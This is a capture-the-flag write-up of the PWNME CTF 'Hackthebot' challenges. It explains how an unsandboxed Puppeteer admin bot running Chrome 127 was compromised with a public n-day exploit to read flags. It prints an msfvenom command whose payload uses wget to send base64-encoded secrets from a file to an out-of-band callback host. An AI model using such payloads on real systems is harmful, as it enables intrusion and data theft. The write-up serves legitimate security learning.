CTFTIME WRITEUP

Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot


#pwnmectf#pwnme#web#ndays

image



  • Hackthebot 1 & 2 are web challenges from PWNME CTF
  • Both challenges shared the same instance: the first flag was stored in a cookie, while the second was located at /root/flag2.txt
  • The intended approach was to exploit XSS to leak the cookie, while the second challenge involved using DevTools in some way
  • But I really surprised with their configurations
const browser = await puppeteer.launch({
            headless: 'new',
            args: ['--remote-allow-origins=*','--no-sandbox', '--disable-dev-shm-usage', `--user-data-dir=${browserCachePath}`]
        });



  • The above code is from source/app.js and gets executed when the admin bot opens the link we provide
  • --no-sandbox flag was enabled, meaning that if I could compromise the renderer, gaining RCE would be ezPZ 😛
  • I quickly checked the browser version 🧐
root@e23711a7c095:~/.cache# ls -la ~/.cache/puppeteer/chrome/
total 12
drwxr-xr-x 3 root root 4096 Mar  1 13:40 .
drwxr-xr-x 4 root root 4096 Mar  1 13:39 ..
drwxr-xr-x 3 root root 4096 Mar  1 13:40 linux-127.0.6533.88



  • They’re running Chrome 127 🤔
  • This version is vulnerable to multiple CVEs.

image



image



  • So I replaced the shellcode in the exploit and sent the link to ADMIN bot

image



  • And got the second flag PWNME{Th3re_ls_Mu1T1pL3_US4g3_Of_C4CH3:333} 😝
  • For the first flag
msfvenom -p linux/x64/exec CMD='wget https://uglxpmedoaubicfpwdzk5zdyse62qt1id.oast.fun/flag1=$(cat</app/app.js|grep${IFS}PWNME{|base64)' -f py

image



  • This scenario underscored the importance of examining configurations closely, as they can sometimes lead to unintended paths.
  • I appreciate you taking the time to read this write-up :) hope you found it interesting! Thanks for reading! 😊


Hack The Box

It would be appreciated if you give me a respect+ on HTB